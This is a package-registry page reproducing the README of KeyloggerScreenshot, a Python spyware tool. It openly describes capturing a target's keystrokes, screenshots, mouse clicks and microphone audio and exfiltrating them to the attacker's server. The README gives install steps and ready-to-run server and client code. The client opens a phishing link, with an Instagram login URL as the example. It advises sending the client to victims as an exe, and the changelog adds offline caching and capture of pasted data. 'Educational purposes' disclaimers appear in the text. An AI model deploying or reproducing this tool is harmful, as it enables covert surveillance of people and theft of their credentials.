Socket
Socket
Sign inDemoInstall

KeyloggerScreenshot

Package Overview
Dependencies
0
Maintainers
1
Alerts
File Explorer

Install Socket

Detect and block malicious and high-risk dependencies

Install

    KeyloggerScreenshot

Exporting Keylogger files, recording audio, recording mouse click information and screenshots of the target. For more information check out my website:https://pypi.org/project/KeyloggerScreenshot/ and my github: https://github.com/Facileee/KeyloggerScreenshot


Maintainers
1

Readme

KeyloggerScreenshot

Created by: Fawaz Bashiru

KeyloggerScreenshot allows the attacker to get all the information the target was typing and taking screenshot of specific minutes which is being calculated in the script and all the audio of the target was speaking will be stored where your server is located. You can open a link when the keylogger is executed. Follow the instructions to build your own server in "KeyloggerScreenshot"

check out my github (easier way): https://github.com/Kill0geR/KeyloggerScreenshot

GITHUB-VERSION (SNEAK PEAK):

kali_img

SHOUT OUT TO:

NAME: dyma020

Link to his insta: https://www.instagram.com/dyma020/

He had the idea of the mouse information. He also build the graphical user interface. Big thanks to him

HOW DOES KeyloggerScreenshot WORK?

To install KeyloggerScreenshot simply write:

pip install KeyloggerScreenshot

in your terminal

After that create a server:

Server

#EveryServer.py:
import KeyloggerScreenshot as ks
import threading

ip = "127.0.0.1"

ip_photos, port_photos = ip, 1111
server_photos = ks.ServerPhotos(ip_photos, port_photos)

ip_keylogger, port_keylogger = ip, 2222
server_keylogger = ks.ServerKeylogger(ip_keylogger, port_keylogger)

ip_listener, port_listener = ip, 3333
server_listener = ks.ServerListener(ip_listener, port_listener)

ip_time, port_time = ip, 4444
server_time = ks.Timer(ip_time, port_time)

threading_server = threading.Thread(target=server_photos.start)
threading_server.start()

threading_server2 = threading.Thread(target=server_keylogger.start)
threading_server2.start()

threading_server3 = threading.Thread(target=server_listener.start)
threading_server3.start()

threading_server4 = threading.Thread(target=server_time.start_timer)
threading_server4.start()

Client

#client_target.py
import KeyloggerScreenshot as ks

ip = '127.0.0.1'
key_client = ks.KeyloggerTarget(ip, 1111, ip, 2222, ip, 3333,ip, 4444, duration_in_seconds=60, phishing_web="https://www.instagram.com/accounts/login/?__coig_restricted=1") # You can open a link when the keylogger starts
key_client.start()

You can specify the time of running in seconds in the "duration_in_seconds" variable

Essential Informations:

  • This module can be used in Windows and Linux

  • The servers can now be run in the same file with the module threading

  • The port number for each server should be different

  • The server should obviously be run before the client

  • You can just copy the following code and insert you ip-address in the variable "ip"

  • You can find your ip-address in the command line by using the command "ipconfig"

  • If you want a cool simulation you can specify that in ServerKeylogger by setting the Parameter simulater to True

  • You can open a link that you can choose when the keylogger is executed. Set the Parameter "phishing_web" to your link

  • If you really want to send this to work externally, you have to buy a server and download the code on my github.

  • If backspace is pressed the last pressed character will be deleted from the list

Output

   / //_/___   __  __ / /____   ____ _ ____ _ ___   _____/ ___/ _____ _____ ___   ___   ____   _____ / /_   ____   / /_
  / ,<  / _ \ / / / // // __ \ / __ `// __ `// _ \ / ___/\__ \ / ___// ___// _ \ / _ \ / __ \ / ___// __ \ / __ \ / __/
 / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_  
/_/ |_|\___/ \__, //_/ \____/ \__, / \__, / \___//_/   /____/ \___//_/    \___/ \___//_/ /_//____//_/ /_/ \____/ \__/  
            /____/           /____/ /____/    

                        ~Created by: Fawaz Bashiru~          
                        ~Write "python KLS_start.py -help" for help in the github version~   
                        REMINDER THIS WAS BUILD FOR EDUCATIONAL PURPOSES  
                        SO DON'T USE THIS FOR EVIL ACTIVITIES !!!!!                        
        
Cyan: ServerPhotos
Blue: ServerKeylogger
Green: ServerListener
White: Timer

Waiting for connection...
Waiting for connection...
Waiting for connection....
Connection has been established with ('127.0.0.1', 49162)
The target is being connected. The Data of the target is coming....
Time left: 00:01
Successful connection for 1 minutes


Connection has been established with ('127.0.0.1', 49199)

Connection has been established with ('127.0.0.1', 49198)
The coordinates of the target have been saved to your directory
True
Text of target: Hello and welcome to KeyloggerScreenshot. I hope you like it and please remember do not use this for evil activities [TAB] 
"Audio of Target.wav" has been saved to your directory
Simulation will come in 10 seconds!!!
3 Images has been saved to your working directory
Waiting for connection...
Do you want to start y/n?: y

The target has clicked 1 times on his screen
This simulation will last for 0 minutes and 27 seconds

Time left: 00:01
THANK YOU FOR YOU USING KEYLOGGERSCREENSHOT
ERFOLGREICH: Der Prozess mit PID 7768 wurde beendet.

Directory of Attacker

endresult

Additional

  • You can send "target.py" as an exe file to the target with "auto-py-to-exe"

  • KeyloggerScreenshot is very easy to use.

  • The servers can be used on any OS. The client should be a Windows OS

  • DO NOT USE THIS TO ATTACK SOMEONE FOREIGN. I BUILD IT FOR EDUCATIONAL PURPOSES.

  • Simulation_code.py wont work properly on Virtual Machine

  • Server will shutdown automatically after everything has been sent to the server.

Change Log

0.0.1 (14/10/2022)

  • First Release

0.0.2 (15/10/2022)

  • Bug Fixes

0.0.3 (15/10/2022)

  • Bug Fixes

0.0.4 (17/10/2022)

  • New features (Audio Recorder from target, All Servers in one file)
  • Bug Fixes
  • Detailed review of the code

0.0.5 (18/10/2022)

  • Better audio connection
  • Bug Fixes

0.0.6 (19/10/2022)

  • New Timer Class
  • Better Output on Terminal
  • More efficient connection
  • More Ports and IP's

0.0.6.1 (19/10/2022)

  • Bug Fixes-

0.0.7 (24/10/2022)

  • Better Description

0.1.0 (30/10/2022)

  • Bug Fixes
    • pyscreeze Error fixed
  • Keyboard Interruption (server will be destroyed after Keyboard Interruption from the user)
  • Keylogger data even after Keyboard Interruption
  • Much better Audio connection
  • Better Audio Files

0.1.1 (30/10/2022)

  • Image fix on website

0.1.2 (7/11/2022)

  • Bug Fixes
  • Big Update 12.11.2022

0.2.2 (04/02/2023)

  • Audio of target got fixed
  • Mouse log in fixed
    • All Mouse Logs will be saved in "mouseLogInfo.txt"
  • new function called "check_double" which detects if there are more files

0.2.3 (10/02/2023)


  • Multiple Mouse Log Text Files at ones
  • New Graphical User Interface (GUI)
  • New simulation feature (only on linux)
  • Capslock detection
  • Better documentation

0.2.3.2 (11/02/2023)

  • Multiple Image Files at ones

0.2.4 (12/02/2023)

  • special caps characters
  • simulation now on windows
  • New speed calculation

0.2.4.1 (16/02/2023)

  • simulation fix

0.2.4.2 (03/03/2023)

  • stops the process of the python script
  • OS Error fixed in Server
  • exe file planned for GitHub

0.2.5 (04/03/2023)

  • Detects if no microphone is plugged in
  • Detects if the microphone setting has been disabled
  • Cleaner Code
  • New Funktion on "ServerPhotos" called "get_data". This funktion gets the data which has been sent via sockets
  • KeyloggerScreenshot now runs on servers without a display on github: https://github.com/Kill0geR/KeyloggerScreenshot

0.2.6 (13/03/2023)

  • You can now open a link on the victims machine
  • Set the variable "phishing_web" with your link
  • Cleaner code
  • No Global variables more

0.2.7 (14/03/2023)

  • New code on github
  • Cleaner code
  • More efficient code

0.2.7.1 (17/03/2023)

  • Phishing link server fix

0.2.7.2 (18/03/2023)

  • simulation timer fixed
  • better terminal on simulation
  • numbers can now be sent (fixed)

0.2.8 (31/03/2023)

  • Port number fixed
  • Already used ports will now be shown

0.2.9 (03/04/2023)

  • Better Port documentation
  • New File "Simulation_code.py" (This stores the code for the simulation. Only on GitHub!!!)
  • Cleaner ServerKeylogger code
  • New help instruction on KLS_start on GitHub

0.2.9.1 (15/04/2023)

  • Data which the target has pasted will now be shown on the server
  • Documentation incoming

0.3.0 (20/04/2023)

0.3.1 (26/04/2023)

  • Bug fixes
  • Cleaner Code

0.4.0 (30/04/2023)

  • Cleaner Code in Simulation_code.py script
  • Directories of the target will be deleted after Keyboard interruption
  • New File on KeyloggerScreenshot Local_Deleter.py + Documentation
  • After Backspace a new list will be shown
  • More intelligent Keylogger (understands when to change the list)
  • Stops the process of images also in linux with PID
  • PID fix on windows
  • duration_in_seconds has been changed to 60 seconds from 200 seconds
  • Mouseclick information will now be sent after Interruption
  • More intelligent Keylogger
  • If backspace is pressed the last pressed character will be deleted from the list
  • Detects if backspace is hold for a long time

0.4.1 (08/05/2023)

  • Fixed Interruption Error
  • Every coordinate of the target no mater what Image size it has will now be shown on the hackers Simulation_code

0.4.2 (23/05/2023)

  • Fixed simulation Error
  • Every coordinate will be shown by order

0.4.3 (22/06/2023)

  • Simulation_code.py will now be made if simulator on Server_keylogger is true

0.5.0 (07/07/2023)

  • All Images will now be sent at once
  • No more random Images
  • More efficient connections
  • New Output
  • New Name of the images ("Image_Target")
  • Data will be stored locally when the server is offline. If the server is online the data will automatically be sent

0.6.0 (10/07/2023)

  • Everything improved from the previous update
  • Detects if the server is offline
  • Py to exe now works without any issues

0.6.1 (10/07/2023)

  • fixed error

0.6.2 (22/08/2023)

  • Terminates server after execution
  • Closes every open socket

0.6.2.1 (07/09/2023)

  • fixed README

Keywords

FAQs


Did you know?

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc